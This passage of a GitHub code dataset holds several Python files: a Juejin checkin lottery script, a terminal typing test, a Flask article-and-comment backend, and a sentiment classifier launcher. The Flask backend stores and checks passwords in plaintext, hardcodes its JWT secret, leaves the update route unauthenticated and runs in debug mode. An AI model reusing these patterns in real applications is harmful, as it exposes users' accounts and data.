lottery info response: %s\" % (TitleType.JueJin.value[0], resp_data))\n        return resp_data\n\n    # Draw the lottery\n    def draw(self):\n        draw_info = self.get_draw_info()\n        if draw_info[\"err_no\"] == 0:\n            if draw_info[\"data\"][\"free_count\"] > 0:\n                draw_url = \"https://api.juejin.cn/growth_api/v1/lottery/draw\"\n                response = requests.post(url=draw_url, cookies=self.cookies)\n                # Response: {'err_no': 0, 'err_msg': 'success', 'data': {'id': 19, 'lottery_id': '6981716980386496552',\n                #  'lottery_name': '11矿石', 'lottery_type': 1, 'lottery_image':\n                # 
'https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/32ed6a7619934144882d841761b63d3c~tplv-k3u1fbpfcp\n                # -no-mark:0:0:0:0.image', 'lottery_desc': '', 'history_id': '7087024855945576482',\n                #  'total_lucky_value': 1699, 'draw_lucky_value': 10}}\n                resp_data = json.loads(response.text)\n                print(\"%s draw response: %s\" % (TitleType.JueJin.value[0], resp_data))\n                if resp_data[\"err_no\"] == 0:\n                    if \"Bug\" != resp_data[\"data\"][\"lottery_name\"]:\n                        return \"Won a prize: %s\" % resp_data[\"data\"][\"lottery_name\"]\n                else:\n                    return \"Draw failed: %s\" % resp_data[\"err_msg\"]\n            else:\n                return \"Already drew today\"\n        else:\n            return \"Failed to get lottery info: %s\" % draw_info[\"err_msg\"]\n\n    # Get user info\n    def get_user_info(self):\n        info_url = \"https://api.juejin.cn/user_api/v1/user/get\"\n        response = requests.get(url=info_url, cookies=self.cookies)\n        print(response.text)\n", "repo_name": "tangjiale/auto-checkin", "sub_path": "checkin/juejin.py", "file_name": "juejin.py", "file_ext": "py", "file_size_in_byte": 5321, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "common.constants.juejin_cookie", "line_number": 23, "usage_type": "attribute"}, {"api_name": "common.constants", "line_number": 23, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 32, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 33, "usage_type": "call"}, {"api_name": "common.title_type.TitleType.JueJin", "line_number": 34, "usage_type": "attribute"}, {"api_name": "common.title_type.TitleType", "line_number": 34, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 46, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 48, "usage_type": "call"}, {"api_name": "common.title_type.TitleType.JueJin", "line_number": 49, "usage_type": "attribute"}, {"api_name": "common.title_type.TitleType", "line_number": 49, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 55, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 56, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 70, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 72, "usage_type": "call"}, {"api_name": "common.title_type.TitleType.JueJin", "line_number": 73, "usage_type": "attribute"}, {"api_name": "common.title_type.TitleType", "line_number": 73, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 85, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 87, "usage_type": "call"}, {"api_name": "common.title_type.TitleType.JueJin", "line_number": 88, "usage_type": "attribute"}, {"api_name": "common.title_type.TitleType", "line_number": 88, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 97, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 103, "usage_type": "call"}, {"api_name": "common.title_type.TitleType.JueJin", "line_number": 104, "usage_type": "attribute"}, {"api_name": "common.title_type.TitleType", "line_number": 104, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 118, "usage_type": "call"}]}
+{"seq_id": "27990850091", "text": "import curses\nfrom curses import wrapper\nimport time\nimport random\n\n\ndef start_screen(stdscr):\n\tstdscr.clear()\n\tstdscr.addstr(\"Welcome to the Speed Typing Test!\")\n\tstdscr.addstr(\"\\nPress any key to begin!\")\n\tstdscr.refresh()\n\tstdscr.getkey()\n\ndef load_text():\n\twith open(\"text.txt\", \"r\") as f:\n\t\tlines = f.readlines()\n\t\treturn random.choice(lines).strip()\n\ndef display(stdscr, target, 
current, wpm = 0):\n stdscr.addstr(target)\n #stdscr.addstr(1, 0, f\"WPM: {wpm}\")\n \n for i, ch in enumerate(current):\n correct = target[i]\n color = curses.color_pair(1)\n if ch != correct:\n color = curses.color_pair(2)\n stdscr.addstr(0, i, ch, color)\n\ndef test(stdscr):\n target = \"Hello world this is some test text for this app!\"\n current =[]\n wpm = 0\n start = time.time()\n stdscr.nodelay(True)\n while True:\n elapsed = max(time.time() - start, 1)\n wpm = round((len(current)/(elapsed/60)) / 5)\n stdscr.clear()\n display(stdscr, target, current, wpm)\n stdscr.addstr(1, 0, f\"WPM: {wpm}\")\n stdscr.refresh()\n \n if \"\".join(current) == target:\n stdscr.nodelay(False)\n break\n \n try:\n key = stdscr.getkey()\n except:\n continue\n\n if len(key) == 1 and ord(key) == 27:\n break\n\n if key in (\"KEY_BACKSPACE\", '\\b', '\\x7f'):\n if len(current) > 0:\n current.pop()\n elif len(current) < len(target):\n current.append(key)\n\n\ndef main(stdscr):\n curses.init_pair(1, curses.COLOR_GREEN, curses.COLOR_BLACK)\n curses.init_pair(2, curses.COLOR_RED, curses.COLOR_BLACK)\n curses.init_pair(3, curses.COLOR_WHITE, curses.COLOR_BLACK) \n start_screen(stdscr)\n test(stdscr)\n stdscr.addstr(2, 0, \"Completed! Press any key to continue\")\n\nwrapper(main)\n", "repo_name": "gitrospective/TermText", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1872, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "random.choice", "line_number": 17, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 25, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 27, "usage_type": "call"}, {"api_name": "time.time", "line_number": 34, "usage_type": "call"}, {"api_name": "time.time", "line_number": 37, "usage_type": "call"}, {"api_name": "curses.init_pair", "line_number": 64, "usage_type": "call"}, {"api_name": "curses.COLOR_GREEN", "line_number": 64, "usage_type": "attribute"}, {"api_name": "curses.COLOR_BLACK", "line_number": 64, "usage_type": "attribute"}, {"api_name": "curses.init_pair", "line_number": 65, "usage_type": "call"}, {"api_name": "curses.COLOR_RED", "line_number": 65, "usage_type": "attribute"}, {"api_name": "curses.COLOR_BLACK", "line_number": 65, "usage_type": "attribute"}, {"api_name": "curses.init_pair", "line_number": 66, "usage_type": "call"}, {"api_name": "curses.COLOR_WHITE", "line_number": 66, "usage_type": "attribute"}, {"api_name": "curses.COLOR_BLACK", "line_number": 66, "usage_type": "attribute"}, {"api_name": "curses.wrapper", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "11696861124", "text": "from flask import Flask, jsonify , request \nfrom flask_sqlalchemy import SQLAlchemy\nimport datetime\nfrom flask_marshmallow import Marshmallow\nfrom flask_cors import CORS\nfrom flask_jwt_extended import create_access_token\nfrom flask_jwt_extended import get_jwt_identity, jwt_required\nfrom flask_jwt_extended import jwt_required\nfrom flask_jwt_extended import JWTManager\nfrom werkzeug.utils import secure_filename\nimport firebase_admin\nfrom firebase_admin import credentials, storage\nfrom sqlalchemy import func\nfrom werkzeug.security import check_password_hash\n\n\n\n \napp = Flask(__name__)\nCORS(app)\n\n# Setup the Flask-JWT-Extended extension\napp.config[\"JWT_SECRET_KEY\"] = \"ggghghghghghghvg\" # Change this!\njwt = JWTManager(app)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 
'mysql://root:''@localhost/flask2'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\nma = Marshmallow(app)\n\n\n\nclass Articles(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(100))\n video_URL = db.Column(db.Text)\n body = db.Column(db.Text)\n date = db.Column(db.DateTime, default=datetime.datetime.now)\n author_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n comments = db.relationship('Comment', backref='article', lazy=True)\n course = db.Column(db.String(100))\n likes = db.relationship('Like', backref='liked_article', lazy='dynamic')\n\n\n def __init__(self, title, body, video_URL ,author_id,course):\n self.title = title\n self.body = body\n self.video_URL = video_URL\n self.author_id = author_id\n self.course = course\n\nclass Like(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)\n article_id_like = db.Column(db.Integer, db.ForeignKey('articles.id'))\n \n\nclass User(db.Model):\n id = db.Column(db.Integer, primary_key=True) \n username = db.Column(db.String(50), unique=True, nullable=False) \n password = db.Column(db.String(100), nullable=False) \n profile_picture = db.Column(db.String(200)) \n articles = db.relationship('Articles', backref='author', lazy=True) \n comments = db.relationship('Comment', backref='author', lazy=True) \n likes = db.relationship('Like', backref='user', lazy=True)\n\n\n def __init__(self, username, password , profile_picture):\n self.username = username\n self.password = password\n self.profile_picture = profile_picture\n\nclass Comment(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n content = db.Column(db.Text)\n video_URL = db.Column(db.Text)\n article_id = db.Column(db.Integer, db.ForeignKey('articles.id'))\n author_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n\n def __init__(self, content, article_id, author_id, video_URL=None):\n self.content = content\n self.video_URL = video_URL\n self.article_id = article_id\n self.author_id = author_id\n \n\nclass ArticleSchema(ma.Schema):\n class Meta:\n fields = ('id','title','body','date','video_URL','author_id','course')\n\narticle_schema = ArticleSchema()\narticles_schema = ArticleSchema(many=True)\n\n@app.route('/get', methods=['GET'])\ndef get_articles():\n all_articles = Articles.query.all()\n\n # Create a list to store articles and their corresponding like counts\n articles_with_likes = []\n\n for article in all_articles:\n # Count the number of likes for each article\n like_count = Like.query.filter_by(article_id_like=article.id).count()\n articles_with_likes.append((article, like_count))\n\n # Sort articles based on like counts in descending order\n sorted_articles = sorted(articles_with_likes, key=lambda x: x[1], reverse=True)\n\n articles_data = []\n\n for article, like_count in sorted_articles:\n article_data = article_schema.dump(article)\n article_data['comments'] = get_comments_data(article.id)\n article_data['like_count'] = like_count\n articles_data.append(article_data)\n\n return jsonify(articles_data)\n\ndef get_comments_data(article_id):\n article = Articles.query.get(article_id)\n if not article:\n return []\n\n comments = article.comments\n comments_data = []\n for comment in comments:\n comment_data = {\n 'id': comment.id,\n 'content': comment.content,\n 'video_URL': comment.video_URL, # Include the video_URL field\n 'author_id': comment.author_id,\n 'author_username': comment.author.username\n }\n 
comments_data.append(comment_data)\n\n return comments_data\n\n@app.route('/add', methods = ['POST'])\n@jwt_required()\ndef add_article():\n title = request.json['title']\n body = request.json['body']\n video_URL = request.json['video_URL']\n course = request.json['course'] \n current_user = get_jwt_identity()\n user = User.query.filter_by(username=current_user).first()\n if not user:\n return jsonify({\"msg\": \"User not found\"}), 404\n article= Articles(title=title, body=body, video_URL=video_URL , course=course ,author_id=user.id)\n db.session.add(article)\n db.session.commit()\n return article_schema.jsonify(article)\n\n@app.route('/update//', methods = ['PUT'])\ndef update_article(id):\n article = Articles.query.get(id)\n title = request.json['title']\n body = request.json['body']\n video_URL = request.json['video_URL']\n course = request.json['course']\n\n article.title = title\n article.body = body\n article.video_URL = video_URL\n article.course = course\n \n db.session.commit()\n return article_schema.jsonify(article)\n\n@app.route('/delete//', methods = ['DELETE'])\n@jwt_required()\ndef article_delete(id):\n current_user = get_jwt_identity()\n article = Articles.query.get(id)\n user = User.query.filter_by(username=current_user).first()\n if user.id == article.author_id:\n db.session.delete(article)\n db.session.commit()\n else:\n return jsonify({\"msg\": \"Your not the owner\"}), 404\n return article_schema.jsonify(article)\n\n@app.route('/add-comment/', methods=['POST'])\n@jwt_required()\ndef add_comment(article_id):\n current_user = get_jwt_identity()\n user = User.query.filter_by(username=current_user).first()\n if not user:\n return jsonify({\"msg\": \"User not found\"}), 404\n\n article = Articles.query.get(article_id)\n if not article:\n return jsonify({\"msg\": \"Article not found\"}), 404\n\n content = request.json['content']\n video_URL = request.json['video_URL']\n title = request.json['title']\n \n comment = Comment(content=content, video_URL=video_URL, article_id=article_id, author_id=user.id)\n db.session.add(comment)\n db.session.commit()\n return jsonify({\"msg\": \"Comment added successfully\"}), 200\n\n\n@app.route('/get-comments/', methods=['GET'])\ndef get_comments(article_id):\n article = Articles.query.get(article_id)\n if not article:\n return jsonify({\"msg\": \"Article not found\"}), 404\n\n comments = article.comments\n comments_data = []\n for comment in comments:\n comment_data = {\n 'id': comment.id,\n 'content': comment.content,\n 'author_id': comment.author_id,\n 'author_username': comment.author.username,\n 'video_URL':comment.video_URL\n }\n comments_data.append(comment_data)\n\n return jsonify(comments_data), 200\n\n\n@app.route('/delete-comment/', methods=['DELETE'])\n@jwt_required()\ndef delete_comment(comment_id):\n current_user = get_jwt_identity()\n user = User.query.filter_by(username=current_user).first()\n if not user:\n return jsonify({\"msg\": \"User not found\"}), 404\n\n comment = Comment.query.get(comment_id)\n if not comment:\n return jsonify({\"msg\": \"Comment not found\"}), 404\n\n if user.id != comment.author_id:\n return jsonify({\"msg\": \"You are not the owner of this comment\"}), 403\n\n db.session.delete(comment)\n db.session.commit()\n return jsonify({\"msg\": \"Comment deleted successfully\"}), 200\n\n@app.route('/token', methods=['POST'])\ndef create_token():\n username = request.json.get(\"username\", None)\n password = request.json.get(\"password\", None)\n \n if not username or not password:\n return 
jsonify({\"message\": \"Username and password are required.\"}), 400\n\n user = User.query.filter_by(username=username).first()\n if not user:\n return jsonify({\"message\": \"User does not exist. Please sign up.\"}), 404\n if user.password != password:\n return jsonify({\"message\": \"incorrect password \"}), 401\n\n access_token = create_access_token(identity=username)\n return jsonify(access_token=access_token, user1=username, userId=user.id), 200\n\n\n@app.route('/signup', methods=['POST'])\ndef signup():\n data = request.get_json()\n username = data.get(\"username\")\n password = data.get(\"password\")\n profile_picture = data.get(\"profile_picture\")\n\n if not username or not password:\n return jsonify({\"message\": \"Username and password are required.\"}), 400\n\n existing_user = User.query.filter_by(username=username).first()\n\n if existing_user:\n return jsonify({\"message\": \"Username already exists. Please log in.\"}), 409\n\n # Create a new user record\n user = User(username=username, password=password, profile_picture=profile_picture)\n db.session.add(user)\n db.session.commit()\n\n access_token = create_access_token(identity=username)\n return jsonify(access_token=access_token, user1=username, userId=user.id, profile_picture=profile_picture), 200\n\n@app.route('/getuser/', methods=['GET'])\ndef get_user(article_id):\n article = Articles.query.get(article_id)\n if not article:\n return jsonify({\"msg\": \"Article not found\"}), 404\n\n user = User.query.filter_by(id=article.author_id).first()\n if user:\n user_data = {\n 'id': user.id,\n 'username': user.username,\n 'profile_picture': user.profile_picture,\n }\n print(user_data)\n return jsonify(user_data), 200\n else:\n return jsonify({\"msg\": \"User not found\"}), 404\n \n@app.route('/getuser_articles/', methods=['GET'])\ndef getuser_articles(user_id):\n user = User.query.filter_by(id=user_id).first()\n if not user:\n return jsonify({\"msg\": \"User not found\"}), 404\n\n all_articles = Articles.query.filter_by(author_id=user.id)\n articles_data = []\n\n for article in all_articles:\n article_data = article_schema.dump(article)\n article_data['comments'] = get_comments_data(article.id)\n articles_data.append(article_data)\n\n return jsonify(articles_data)\n\n@app.route('/search/', methods=['GET'])\ndef search_articles(search_query):\n search_results = Articles.query.filter(Articles.title.ilike(f'%{search_query}%')).all()\n\n # Create a list to store search results and their corresponding like counts\n search_results_with_likes = []\n\n for article in search_results:\n # Count the number of likes for each article\n like_count = Like.query.filter_by(article_id_like=article.id).count()\n search_results_with_likes.append((article, like_count))\n\n # Sort search results based on like counts in descending order\n sorted_search_results = sorted(search_results_with_likes, key=lambda x: x[1], reverse=True)\n\n articles_data = []\n for article, like_count in sorted_search_results:\n article_data = article_schema.dump(article)\n article_data['comments'] = get_comments_data(article.id)\n article_data['like_count'] = like_count\n articles_data.append(article_data)\n\n return jsonify(articles_data)\n\n@app.route('/search_course/', methods=['GET'])\ndef search_articlescourse(search_query):\n search_results = Articles.query.filter(Articles.course.ilike(f'%{search_query}%')).all()\n\n # Create a list to store search results and their corresponding like counts\n search_results_with_likes = []\n\n for article in search_results:\n # Count 
the number of likes for each article\n like_count = Like.query.filter_by(article_id_like=article.id).count()\n search_results_with_likes.append((article, like_count))\n\n # Sort search results based on like counts in descending order\n sorted_search_results = sorted(search_results_with_likes, key=lambda x: x[1], reverse=True)\n\n articles_data = []\n for article, like_count in sorted_search_results:\n article_data = article_schema.dump(article)\n article_data['comments'] = get_comments_data(article.id)\n article_data['like_count'] = like_count\n articles_data.append(article_data)\n\n return jsonify(articles_data)\n\n@app.route('/like-article/', methods=['POST'])\n@jwt_required()\ndef like_article(article_id):\n current_user = get_jwt_identity()\n user = User.query.filter_by(username=current_user).first()\n user_id = user.id \n article = Articles.query.get(article_id)\n if article is None:\n return jsonify({'error': 'Article not found'}), 404\n\n existing_like = Like.query.filter_by(user_id=user_id, article_id_like=article.id).first()\n if existing_like:\n db.session.delete(existing_like)\n else:\n new_like = Like(user_id=user_id, article_id_like=article.id)\n db.session.add(new_like)\n \n db.session.commit()\n\n # Get the updated likes count and return it\n likes_count = Like.query.filter_by(article_id_like=article.id).count()\n return jsonify({'likes_count': likes_count})\n\n@app.route('/get-article-likes/', methods=['GET'])\ndef get_article_likes(article_id):\n article = Articles.query.get(article_id)\n likes_count = Like.query.filter_by(article_id_like=article.id).count()\n return jsonify({'likes_count': likes_count})\n\n@app.route('/has-liked-article/', methods=['GET'])\n@jwt_required()\ndef has_liked_article(article_id):\n current_user = get_jwt_identity()\n user = User.query.filter_by(username=current_user).first()\n user_id = user.id\n article = Articles.query.get(article_id)\n if article is None:\n return jsonify({'error': 'Article not found'}), 404\n \n existing_like = Like.query.filter_by(user_id=user_id, article_id_like=article.id).first()\n if existing_like:\n return jsonify({'has_liked': True})\n else:\n return jsonify({'has_liked': False})\n\n\n@app.route('/getuser1/', methods=['GET'])\ndef get_user1(user_id):\n user = User.query.filter_by(id=user_id).first()\n if user:\n user_data = {\n 'id': user.id,\n 'username': user.username,\n 'profile_picture': user.profile_picture,\n }\n print(user_data)\n return jsonify(user_data), 200\n else:\n return jsonify({\"msg\": \"User not found\"}), 404\n \n@app.route('/update-username/', methods=['PUT'])\n@jwt_required()\ndef update_username(user_id):\n new_username = request.json.get('new_username')\n password = request.json.get('password')\n\n user = User.query.get(user_id)\n if not user:\n return jsonify({\"msg\": \"User not found\"}), 404\n\n if password != user.password:\n return jsonify({\"msg\":\"Wrong password\"}),401\n\n existing_user = User.query.filter_by(username=new_username).first()\n if existing_user:\n return jsonify({\"msg\": \"Username already exists\"}), 409\n\n user.username = new_username\n db.session.commit()\n\n return jsonify({\"msg\": \"Username updated successfully\"}), 200\n\nif __name__ == \"__main__\":\n app.run(debug=True)", "repo_name": "Kenzoe2004/ReactThreadsApp", "sub_path": "Website/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 15606, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", 
"line_number": 19, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 20, "usage_type": "call"}, {"api_name": "flask_jwt_extended.JWTManager", "line_number": 24, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 29, "usage_type": "call"}, {"api_name": "flask_marshmallow.Marshmallow", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 39, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 118, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 142, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 142, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 143, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 143, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 144, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 144, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 145, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 145, "usage_type": "name"}, {"api_name": "flask_jwt_extended.get_jwt_identity", "line_number": 146, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 149, "usage_type": "call"}, {"api_name": "flask_jwt_extended.jwt_required", "line_number": 140, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 158, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 158, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 159, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 159, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 160, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 160, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 161, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 161, "usage_type": "name"}, {"api_name": "flask_jwt_extended.get_jwt_identity", "line_number": 174, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 181, "usage_type": "call"}, {"api_name": "flask_jwt_extended.jwt_required", "line_number": 172, "usage_type": "call"}, {"api_name": "flask_jwt_extended.get_jwt_identity", "line_number": 187, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 190, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 194, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 196, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 196, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 197, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 197, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 198, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 198, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 203, "usage_type": "call"}, {"api_name": "flask_jwt_extended.jwt_required", "line_number": 185, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 210, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 224, "usage_type": "call"}, {"api_name": "flask_jwt_extended.get_jwt_identity", "line_number": 230, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 233, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 237, "usage_type": 
"call"}, {"api_name": "flask.jsonify", "line_number": 240, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 244, "usage_type": "call"}, {"api_name": "flask_jwt_extended.jwt_required", "line_number": 228, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 248, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 248, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 248, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 249, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 249, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 249, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 252, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 256, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 258, "usage_type": "call"}, {"api_name": "flask_jwt_extended.create_access_token", "line_number": 260, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 261, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 266, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 266, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 272, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 277, "usage_type": "call"}, {"api_name": "flask_jwt_extended.create_access_token", "line_number": 284, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 285, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 291, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 301, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 303, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 309, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 319, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 343, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 367, "usage_type": "call"}, {"api_name": "flask_jwt_extended.get_jwt_identity", "line_number": 372, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 377, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 390, "usage_type": "call"}, {"api_name": "flask_jwt_extended.jwt_required", "line_number": 370, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 396, "usage_type": "call"}, {"api_name": "flask_jwt_extended.get_jwt_identity", "line_number": 401, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 406, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 410, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 412, "usage_type": "call"}, {"api_name": "flask_jwt_extended.jwt_required", "line_number": 399, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 425, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 427, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 432, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 432, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 432, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 433, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 433, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 433, "usage_type": "name"}, {"api_name": 
"flask.jsonify", "line_number": 437, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 440, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 444, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 449, "usage_type": "call"}, {"api_name": "flask_jwt_extended.jwt_required", "line_number": 430, "usage_type": "call"}]} +{"seq_id": "14947225791", "text": "import sys\nimport os\nimport pandas as pd\nimport argparse\n\nfrom artificial_neural_network import ArtificialNeuralNetwork\nfrom naive_bayes import NaiveBayes\n\nCLASSIFIER_TO_CONSTRUCTOR = {\"nb\" : NaiveBayes, \"ann\" : ArtificialNeuralNetwork}\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--train_file',\n default='kaggle_1000rows_ngram_tfidf.pkl',\n help='name of train pickle file')\n parser.add_argument('--test_file',\n type=str,\n default=None,\n help='name of test pickle file')\n parser.add_argument('--transfer_flag',\n type=int,\n default=0,\n help='flag to use transfer learning')\n\n args = parser.parse_args()\n\n dataDirPath = sys.argv[1]\n classifier_type = sys.argv[2]\n\n if not os.path.isdir(dataDirPath):\n print(\"Error: Directory \\\"\" + dataDirPath + \"\\\" does not exist.\")\n sys.exit(1)\n\n if classifier_type not in CLASSIFIER_TO_CONSTRUCTOR:\n print(\"Error: Classifier type must be one of \" +\n str(list(CLASSIFIER_TO_CONSTRUCTOR.keys())) + \".\")\n sys.exit(1)\n\n train_file = args.train_file\n test_file = args.test_file\n transfer_flag = args.transfer_flag\n\n if not os.path.isfile(os.path.join(dataDirPath, train_file)):\n print('Error: Train file ' + train_file + ' does not exist.')\n sys.exit(1)\n if test_file:\n if not os.path.isfile(os.path.join(dataDirPath, test_file)):\n print('Error: Test file' + test_file + 'does not exist.')\n sys.exit(1)\n\n # Classify data and output results to \"classifications.csv\"\n # First column is some sort of identifier for the tweets, I think \"UserName\"?\n # Second column is the class label.\n idSentiments = {}\n classifier = CLASSIFIER_TO_CONSTRUCTOR[classifier_type]()(dataDirPath, idSentiments, train_file, test_file, transfer_flag)\n print(idSentiments)\n \n if idSentiments != {}:\n pd.DataFrame(idSentiments).to_csv(\"classifications.csv\",\n header=[\"id\", \"sentiment\"], index=False)\n", "repo_name": "mtruong1999/Coronavirus-Twitter-NLP", "sub_path": "src/classify.py", "file_name": "classify.py", "file_ext": "py", "file_size_in_byte": 2242, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "naive_bayes.NaiveBayes", "line_number": 9, "usage_type": "name"}, {"api_name": "artificial_neural_network.ArtificialNeuralNetwork", "line_number": 9, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 12, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 28, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 33, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 44, "usage_type": "call"}, {"api_name": "sys.exit", 
"line_number": 46, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 60, "usage_type": "call"}]} +{"seq_id": "8943430751", "text": "from flask import Flask, render_template_string, request, url_for\nfrom flight_data import FlightData\nfrom pydantic import ValidationError\n\napp = Flask(__name__)\n\n# serve the homepage to the user\n@app.route('/', methods=['GET'])\ndef index():\n # render the form for the user input\n return render_template_string('''\n
<form action=\"/submit_form\" method=\"post\">\n            Flight Number: <input type=\"text\" name=\"flight_number\">\n            <input type=\"submit\" value=\"Submit\">\n            </form>
